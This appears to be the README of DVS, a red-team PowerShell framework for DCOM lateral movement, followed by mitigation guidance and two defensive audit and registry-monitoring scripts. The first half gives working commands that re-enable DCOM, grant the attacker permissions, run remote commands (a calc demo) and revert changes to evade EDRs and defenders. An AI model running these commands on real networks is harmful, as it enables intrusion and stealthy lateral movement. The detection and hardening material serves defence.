Did you ever wonder how you can move laterally through internal networks, or interact with remote machines without alerting EDRs?
Let’s assume that we have valid credentials, or an active session with access to a remote machine, but no option for executing a process remotely in a known, expected or highly monitored method (i.e. WMI, Task Scheduler, WinRM, PowerShell Remoting).
For these scenarios, the DVS framework comes to the rescue.
The DVS framework is a Swiss army knife which allows you to enumerate vulnerable functions of remote DCOM objects, launch them and even launch attacks using them.
The framework is developed with a “Red Team” mindset and uses stealthy methods to compromise remote machines.
The DVS framework contains various ways to bypass remote hardening against DCOM by re-enabling DCOM access remotely and automatically granting the required permissions to the attacking user.
The framework can also revert the changes on the remote machine to their original state, prior to the attack, hiding these changes from defenders.
Our main insight is that the tool can also execute commands using non-vulnerable DCOM objects through an awesome technique (read below about Invoke-RegisterRemoteSchema).
Compatible with PowerShell 2.0 and up.
Disclaimer
This tool is for testing and educational purposes only. Any other usage of this code is not allowed. Use at your own risk.
The author bears NO responsibility for misuse of this tool.
By using this you accept the fact that any damage caused by the use of this tool is your responsibility.
Registry access - how the DVS framework utilizes that protocol
- Registry access (Remote Registry): if `AutoGrant` mode is flagged, check write permissions; otherwise, check read permissions.
- Standard Registry Provider (`StdRegProv`, used if remote registry is denied): check that it is accessible; if `AutoGrant` mode is flagged, check for write permissions; otherwise, check for read permissions.
Why is this tool so stealthy?
The DVS tool first checks whether the principal identity has access to the remote machine via the following steps:
Basic actions
- Check registry access (if `SkipRegAuth` is not flagged).
- If registry access is missing, grant it (if `AutoGrant` is flagged); otherwise, fail.
- Check whether the principal identity (resolved via the `adsi`/`WindowsIdentity` feature) is granted to interact with the DCOM object (via remote registry queries).
- If the DCOM permission is missing, grant it (if `AutoGrant` is flagged); otherwise, fail.
- Look up the object's registration (in the `HKLM` or `HKCU` hives).
Tool components
- Invoke-DCOMObjectScan
- Get-ExecutionCommand
- Invoke-ExecutionCommand
- Invoke-RegisterRemoteSchema
Author
License
Tested Scenarios
Tested Operating Systems
Credits
Installation:
git clone https://github.com/ScorpionesLabs/DVS
powershell -ep bypass
PS> Import-Module .\DVS.psm1
PS> Get-Help Invoke-DCOMObjectScan -Detailed # Get details of the Invoke-DCOMObjectScan command
PS> Get-Help Get-ExecutionCommand -Detailed # Get details of the Get-ExecutionCommand command
PS> Get-Help Invoke-ExecutionCommand -Detailed # Get details of the Invoke-ExecutionCommand command
Invoke-DCOMObjectScan
The Invoke-DCOMObjectScan function allows you to scan DCOM objects and find vulnerable functions via a list of patterns or exact function names that you include in a file.
Examples:
1. Enumerates and scans the `MMC20.Application` (ProgID) object from the attacker machine to the `DC01` host without querying the registry.
PS> Invoke-DCOMObjectScan -Type Single -ObjectName "MMC20.Application" -HostList DC01 -SkipRegAuth -Username "lab\administrator" -Password "Aa123456!" -Verbose
Note: the tool will not analyze ACL permissions; when it succeeds, it resolves all the information about the object except the details stored in the registry (such as object name, executable file, etc.).
2. Check whether the `MMC20.Application` (ProgID) object is accessible from the attacker machine to the `DC01` host without first querying and verifying the access list of the DCOM object.
PS> Invoke-DCOMObjectScan -Type Single -ObjectName "MMC20.Application" -HostList DC01 -SkipPermissionChecks -CheckAccessOnly -Verbose
3. Validates whether the `MMC20.Application` (ProgID) object is available throughout the `10.211.55.4/24` range. If it exists, the tool will try to enumerate the information about it (using the current logged-on user session).
PS> Invoke-DCOMObjectScan -Type Single -ObjectName "MMC20.Application" -Hostlist "10.211.55.4/24" -CheckAccessOnly -Verbose
4. Validates whether the `{00020812-0000-0000-C000-000000000046}` CLSID object exists and is accessible through the `10.211.55.4` IP address. If it exists, the tool will resolve the information about it (using `lab\administrator` credentials).
PS> Invoke-DCOMObjectScan -Type Single -ObjectName "{00020812-0000-0000-C000-000000000046}" -Hostlist "10.211.55.4" -CheckAccessOnly -Username "lab\administrator" -Password "Aa123456!" -Verbose
5. Scans all the objects listed in the specified file (e.g. `C:\Users\USERNAME\Desktop\DVS\objects.txt`) through the `10.211.55.4` IP address, and looks for the functions listed in the specified file (e.g. `vulnerable.txt`) using the `lab\administrator` credentials with the _following configuration_:
- Max depth: 4
- Max results: 1 (1 result for each object)
- AutoGrant mode: if we don’t have access to the object or if the DCOM feature is disabled, enable the DCOM feature and automatically grant access to the relevant DCOM object.
- Finally, revert the machine to the same state as before the attack.
PS> Invoke-DCOMObjectScan -MaxDepth 4 -Type List -ObjectListFile "C:\Users\USERNAME\Desktop\DVS\objects.txt" -FunctionListFile "C:\Users\USERNAME\Desktop\DVS\vulnerable.txt" -AutoGrant -Username "lab\administrator" -Password "Aa123456!" -Hostlist "10.211.55.4" -MaxResults 1 -Verbose
6. Scans all the objects stored on the available remote machines in the `10.211.55.1/24` range and finds potentially vulnerable functions from the list located in the selected file (e.g. `C:\Users\USERNAME\Desktop\DVS\vulnerable.txt`).
PS> Invoke-DCOMObjectScan -MaxDepth 4 -Type All -FunctionListFile "C:\Users\USERNAME\Desktop\DVS\vulnerable.txt" -Hostlist "10.211.55.1/24" -Verbose
Get-ExecutionCommand
The Get-ExecutionCommand function allows you to generate a PowerShell payload that will interact with the remote DCOM function and execute it with the relevant parameters.
Examples:
1. Checks if the principal identity is granted to interact with the `{00020812-0000-0000-C000-000000000046}` CLSID object through the `10.211.55.4` IP address using `lab\administrator` credentials, then generates the execution command.
PS> Get-ExecutionCommand -ObjectName "{00020812-0000-0000-C000-000000000046}" -ObjectPath "DDEInitiate" -HostList "10.211.55.4" -Username "lab\Administrator" -Password "Aa123456!" -Verbose
2. Checks for DCOM access. If the principal identity doesn’t have the necessary permissions or the DCOM feature is disabled, the tool enables the DCOM feature, grants the identity access, interacts with the `MMC20.Application` (ProgID) object through the `10.211.55.4` IP address using `lab\administrator` credentials, and generates the execution command for you. Finally, it reverts the machine to the same state as before the attack.
PS> Get-ExecutionCommand -ObjectName "MMC20.Application" -ObjectPath "Document.ActiveView.ExecuteShellCommand" -HostList "10.211.55.4" -Username "lab\Administrator" -Password "Aa123456!" -AutoGrant -Verbose
3. Tries to interact with the `MMC20.Application` (ProgID) object through the `10.211.55.1/24` range using the current logged-on session, without analyzing ACL permissions, then generates the execution command.
PS> Get-ExecutionCommand -ObjectName "MMC20.Application" -ObjectPath "Document.ActiveView.ExecuteShellCommand" -HostList "10.211.55.1/24" -SkipPermissionChecks -Verbose
4. Tries to interact with the `MMC20.Application` (ProgID) object through the `10.211.55.4` IP address, without querying the registry.
PS> Get-ExecutionCommand -ObjectName "MMC20.Application" -ObjectPath "Document.ActiveView.ExecuteShellCommand" -HostList "10.211.55.4" -SkipRegAuth -Verbose
Invoke-ExecutionCommand
The Invoke-ExecutionCommand function executes commands via a DCOM object using the logged-on user or provided credentials.
Examples:
1. Checks for DCOM access. If the principal identity doesn’t have the necessary permissions or the DCOM feature is disabled, the tool enables the DCOM feature, grants access, interacts with the `MMC20.Application` (ProgID) object through the `10.211.55.1/24` range using the current logged-on user session, and executes the following commands:
- Execute the `cmd.exe /c calc` command
- Set the `Frame.Top` attribute to 1
Finally, revert the machine to the same state as before the attack.
PS> Invoke-ExecutionCommand -ObjectName "MMC20.Application" -AutoGrant -Commands @( @{ObjectPath="Document.ActiveView.ExecuteShellCommand"; Arguments=@('cmd.exe',$null,"/c calc","Minimized")},@{ObjectPath="Frame.Top";Arguments=@(1)} ) -HostList "10.211.55.1/24" -Verbose
2. Tries to interact with the `MMC20.Application` (ProgID) object using `lab\administrator` credentials through the `10.211.55.4` IP address, and executes the following command: `cmd.exe /c calc`.
PS> Invoke-ExecutionCommand -ObjectName "MMC20.Application" -Commands @( @{ObjectPath="Document.ActiveView.ExecuteShellCommand"; Arguments=@('cmd.exe',$null,"/c calc","Minimized")}) -HostList "10.211.55.4" -Username "lab\administrator" -Password "Aa123456!" -Verbose
3. Tries to interact with the `MMC20.Application` (ProgID) object using the current logged-on user session, without analyzing ACL permissions, and executes the following command: `cmd.exe /c calc`.
PS> Invoke-ExecutionCommand -ObjectName "MMC20.Application" -Commands @( @{ObjectPath="Document.ActiveView.ExecuteShellCommand"; Arguments=@('cmd.exe',$null,"/c calc","Minimized")}) -HostList "10.211.55.4" -SkipPermissionChecks -Verbose
Invoke-RegisterRemoteSchema
The Invoke-RegisterRemoteSchema function executes commands via the InternetExplorer.Application object using the logged-on user or provided credentials.
- `ShellBrowserWindow`
- `ShellWindows`
- Internet Explorer
- `ielowutil.exe`
Note: this object doesn’t need any access to the local machine hive; it will proceed with the foothold as any user that can access the remote machine!
Examples:
1. Executes the `cmd /c calc` command on the `10.211.55.1/24` range using the current logged-on session, and grants privileges if needed.
PS> Invoke-RegisterRemoteSchema -HostList "10.211.55.1/24" -Command "cmd /c calc" -AutoGrant -Verbose
2. Executes the `cmd /c calc` command on the `10.211.55.4` remote machine using the provided credentials.
PS> Invoke-RegisterRemoteSchema -HostList "10.211.55.4" -Command "cmd /c calc" -Username "Administrator" -Password "Aa123456!" -Verbose
Future work
Mitigation and Recommendations
MITRE Technique: T1021.003 - Remote Services: Distributed Component Object Model
Prevention
Disable remote DCOM access
Disallow remote registry access if not required
Both options are hard to implement in an enterprise environment without impacting availability. Nevertheless, they can be a good hardening option for endpoints that don’t need remote domain management (e.g. standalone endpoints).
Enable Domain and Private Profiles in Windows Defender Firewall
Move to using LAPS in order to reduce the attack surface. If each computer in the domain has a different local administrator password, this account can’t be used for lateral movement.
Hardening user access rights can prevent this attack.
By using Group Policy Objects, an organization can remove Administrators, Users and other groups from the list, and move to using a dedicated group/user for central management that does not interactively log in to other computers:
[Computer Configuration\Windows Settings\Security Settings\Local Policies\User Rights Assignment\Access this computer from the network]
In official hardening guides like CIS, the recommended setting for [Access this computer from the network] is the values “Administrators and Remote Desktop Users or Authenticated Users”. These recommendations are vulnerable to the DVS tool.
Harden the DCOM permissions by removing the Remote Launch and Remote Activation rights of Administrators.
Use a host-based firewall / application-aware firewall to block DCOM access between computers. Especially for a computer which is not part of the IT or management infrastructure.
Application control rules can be used as the last layer of security controls to prevent vulnerable processes from spawning dangerous child processes or loading DLLs.
Examples:
mmc.exe -> cmd.exe
explorer.exe -> regsvr.exe
visio.exe -> wmic.exe
excel.exe -> Rundll32.exe
outlook.exe -> cmd.exe
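As an added example from the defender's side (this is not DVS project code), the following PowerShell script audits a host against the prevention items above: whether DCOM is enabled, whether the Remote Registry service (which DVS relies on for its registry checks) is running, and which principals hold Remote Launch / Remote Activation rights in the machine-wide DCOM limits, decoding both the local REG_BINARY descriptors under `HKLM\SOFTWARE\Microsoft\Ole` and the SDDL strings a GPO writes under `HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DCOM`. The registry paths are the standard Windows ones and the COM_RIGHTS_* bit values are those defined in objbase.h; the function names are this example's own and it assumes PowerShell 5.1 on the host being checked.

```powershell
# Added example (not DVS project code): read-only audit of a host's DCOM exposure against the
# prevention items above. Assumes PowerShell 5.1 on the host being checked; function names are
# this example's own. COM_RIGHTS_* bit values are those defined in objbase.h.

$COM_RIGHTS_EXECUTE         = 0x01   # legacy bit: on its own it grants local AND remote rights
$COM_RIGHTS_EXECUTE_REMOTE  = 0x04   # remote launch (launch SD) / remote access (access SD)
$COM_RIGHTS_ACTIVATE_REMOTE = 0x10   # remote activation (launch SD only)

function ConvertTo-DcomAceReport {
    # Decode one DCOM security descriptor, either the REG_BINARY form stored under
    # HKLM\SOFTWARE\Microsoft\Ole or the SDDL string a GPO writes under Policies\...\DCOM,
    # into one row per ACE with the remote-relevant bits decoded.
    param([Parameter(Mandatory)]$Descriptor, [string]$Source)

    $sd = if ($Descriptor -is [byte[]]) {
        [System.Security.AccessControl.RawSecurityDescriptor]::new($Descriptor, 0)
    } else {
        [System.Security.AccessControl.RawSecurityDescriptor]::new([string]$Descriptor)
    }
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace -isnot [System.Security.AccessControl.CommonAce]) { continue }
        $mask = $ace.AccessMask
        # A mask with only COM_RIGHTS_EXECUTE set (no local/remote bits) means "everything"
        $legacyAll = (($mask -band 0x1E) -eq 0) -and (($mask -band $COM_RIGHTS_EXECUTE) -ne 0)
        $principal = $ace.SecurityIdentifier.Value
        try { $principal = $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value } catch { }
        [pscustomobject]@{
            Source         = $Source
            Principal      = $principal
            AceType        = $ace.AceType.ToString()
            RemoteExec     = $legacyAll -or (($mask -band $COM_RIGHTS_EXECUTE_REMOTE) -ne 0)
            RemoteActivate = $legacyAll -or (($mask -band $COM_RIGHTS_ACTIVATE_REMOTE) -ne 0)
        }
    }
}

function Get-DcomExposureReport {
    $ole    = Get-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Ole' -ErrorAction SilentlyContinue
    $policy = Get-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DCOM' -ErrorAction SilentlyContinue
    $rr     = Get-Service -Name RemoteRegistry -ErrorAction SilentlyContinue

    $aces = @()
    foreach ($name in 'MachineLaunchRestriction', 'MachineAccessRestriction') {
        # A GPO-delivered SDDL string under the Policies key overrides the local REG_BINARY value
        if ($policy -and $policy.$name) { $aces += @(ConvertTo-DcomAceReport -Descriptor $policy.$name -Source "Policy\$name") }
        elseif ($ole -and $ole.$name)   { $aces += @(ConvertTo-DcomAceReport -Descriptor $ole.$name    -Source "Ole\$name") }
    }
    $remote  = $aces | Where-Object { $_.AceType -eq 'AccessAllowed' -and ($_.RemoteExec -or $_.RemoteActivate) }
    $rrState = if ($rr) { "$($rr.Status) / $($rr.StartType)" } else { 'not installed' }

    [pscustomobject]@{
        EnableDCOM           = $ole.EnableDCOM        # 'Y' unless remote DCOM has been disabled on this host
        RemoteRegistry       = $rrState               # DVS needs this service for its registry checks
        RemoteDcomPrincipals = @($remote | Select-Object -ExpandProperty Principal -Unique)
        Aces                 = $aces
    }
}

$report = Get-DcomExposureReport
$report | Select-Object EnableDCOM, RemoteRegistry, RemoteDcomPrincipals | Format-List
$report.Aces | Format-Table -AutoSize
```

Run it elevated on a representative endpoint before and after applying the hardening: a `RemoteDcomPrincipals` list that still contains `BUILTIN\Administrators` means the Remote Launch / Remote Activation removal recommended above has not taken effect, and a running `RemoteRegistry` service with automatic start is what lets the tool's registry-based checks and AutoGrant changes work in the first place.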
Detection
Monitor changes on the registry in the following locations:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole]
This key holds the DCOM permission settings. If they are changed, it can mean that an adversary using the DVS tool has removed the hardening.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes]
“The subkeys and registry values associated with the [HKEY_LOCAL_MACHINE\SOFTWARE\Classes] key contain information about an application that is needed to support COM functionality. This information includes such topics as supported data formats, compatibility information, programmatic identifiers, DCOM, and controls.” (Microsoft Dev Center reference)
[MACHINE\SOFTWARE\policies\Microsoft\windows NT\DCOM\MachineLaunchRestriction]
A change to this key may indicate that the DVS tool has disabled the DCOM Remote Activation and Remote Launch restrictions.
Use an application aware firewall to block DCOM access between computers. Especially from a computer which is not part of the IT or management infrastructure.
An intrusion prevention system (e.g. Snort, Suricata) can be used to detect the DCOM protocol, which is based on RPC (MS-RPC, MS-RPCE), and the Remote Registry protocol (MS-RRP).
Monitor Windows Defender Firewall by enabling the audit log for blocked traffic on the domain and private profiles.
Monitor changes to the following key. It may indicate that the DVS tool has created a rule to bypass the Microsoft Defender Firewall dynamic RPC restrictions.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
Monitor Windows event logs:
Enable auditing of events. Audit settings that should be enabled for both success and failure: Audit account logon events | Audit logon events | Audit object access | NTLM Auditing
Browse to this registry key: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole] and create new DWORDs with a value of ‘1’ called ActivationFailureLoggingLevel | CallFailureLoggingLevel | InvalidSecurityDescriptorLoggingLevel
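To make the registry-monitoring items in the detection list repeatable, here is an added PowerShell example (not DVS project code) that snapshots every value under the keys listed above, plus the per-object `LaunchPermission` / `AccessPermission` descriptors under `HKLM\SOFTWARE\Classes\AppID` (the values an AutoGrant-style change rewrites), and reports what was added, removed or modified since the previous run. It also sets the three `Ole` logging DWORDs from the last item. The baseline file location and all function names are assumptions of this example; it assumes PowerShell 5.1 run as an administrator on the monitored host.

```powershell
# Added example (not DVS project code): snapshot the DCOM-related registry locations named in
# the detection list and diff them against the previous snapshot. Assumes PowerShell 5.1 on
# the monitored host, run as an administrator. Function names are this example's own.
$BaselinePath = Join-Path $env:ProgramData 'dcom-registry-baseline.json'   # assumed location

# Keys from the detection list (every value under each is tracked)
$WatchedKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Ole',
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DCOM',
    'HKLM:\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules'
)

function ConvertTo-Sha256Hex {
    param($Data)
    # Canonicalise REG_BINARY, REG_SZ, REG_DWORD and REG_MULTI_SZ to one text form before hashing
    $text = if ($Data -is [byte[]]) { [BitConverter]::ToString($Data) } else { @($Data) -join ',' }
    $sha  = [System.Security.Cryptography.SHA256]::Create()
    ([BitConverter]::ToString($sha.ComputeHash([Text.Encoding]::UTF8.GetBytes($text)))).Replace('-', '')
}

function Get-DcomWatchedState {
    # Returns a hashtable "<key>\<value name>" -> SHA-256 of the value's data
    $state = @{}
    foreach ($key in $WatchedKeys) {
        if (-not (Test-Path -LiteralPath $key)) { continue }
        $item = Get-Item -LiteralPath $key
        foreach ($name in $item.GetValueNames()) {
            $data = $item.GetValue($name, $null, 'DoNotExpandEnvironmentNames')
            $state["$key\$name"] = ConvertTo-Sha256Hex -Data $data
        }
    }
    # Per-object DCOM ACLs (REG_BINARY security descriptors) that an AutoGrant-style change would rewrite
    foreach ($appId in Get-ChildItem -LiteralPath 'HKLM:\SOFTWARE\Classes\AppID' -ErrorAction SilentlyContinue) {
        foreach ($name in 'LaunchPermission', 'AccessPermission') {
            $data = $appId.GetValue($name)
            if ($null -ne $data) { $state["$($appId.Name)\$name"] = ConvertTo-Sha256Hex -Data $data }
        }
    }
    $state
}

function Compare-DcomWatchedState {
    param([hashtable]$Baseline, [hashtable]$Current)
    $keys = @($Baseline.Keys) + @($Current.Keys) | Sort-Object -Unique
    $changes = foreach ($k in $keys) {
        if (-not $Baseline.ContainsKey($k))     { [pscustomobject]@{ Change = 'Added';    Entry = $k } }
        elseif (-not $Current.ContainsKey($k))  { [pscustomobject]@{ Change = 'Removed';  Entry = $k } }
        elseif ($Baseline[$k] -ne $Current[$k]) { [pscustomobject]@{ Change = 'Modified'; Entry = $k } }
    }
    @($changes)
}

function Enable-DcomFailureLogging {
    # The three DWORDs from the last detection item; 1 = write DCOM activation/call failures
    # and invalid security descriptors to the System event log
    foreach ($name in 'ActivationFailureLoggingLevel', 'CallFailureLoggingLevel', 'InvalidSecurityDescriptorLoggingLevel') {
        Set-ItemProperty -LiteralPath 'HKLM:\SOFTWARE\Microsoft\Ole' -Name $name -Value 1 -Type DWord
    }
}

function Invoke-DcomRegistryCheck {
    # First run records the baseline; every later run reports differences and refreshes it
    $current = Get-DcomWatchedState
    if (Test-Path -LiteralPath $BaselinePath) {
        $baseline = @{}
        $saved = Get-Content -LiteralPath $BaselinePath -Raw | ConvertFrom-Json
        foreach ($p in $saved.PSObject.Properties) { $baseline[$p.Name] = $p.Value }
        $diff = @(Compare-DcomWatchedState -Baseline $baseline -Current $current)
        if ($diff.Count -eq 0) { Write-Host 'No change in DCOM-related registry state since last snapshot' }
        else { $diff | Format-Table -AutoSize }
    } else {
        Write-Host "No baseline yet; recording one at $BaselinePath"
    }
    $current | ConvertTo-Json | Set-Content -LiteralPath $BaselinePath
}

Enable-DcomFailureLogging
Invoke-DcomRegistryCheck
```

Schedule `Invoke-DcomRegistryCheck` to run periodically (or after each GPO refresh) and forward its output to your SIEM: a `Modified` entry for `MachineLaunchRestriction`, `EnableDCOM` or an `AppID\...\LaunchPermission` value, or an `Added` entry under `FirewallRules`, matches exactly the changes the mitigation text above attributes to the tool, and if the changes were later reverted the baseline still carries the intermediate state from the run in between.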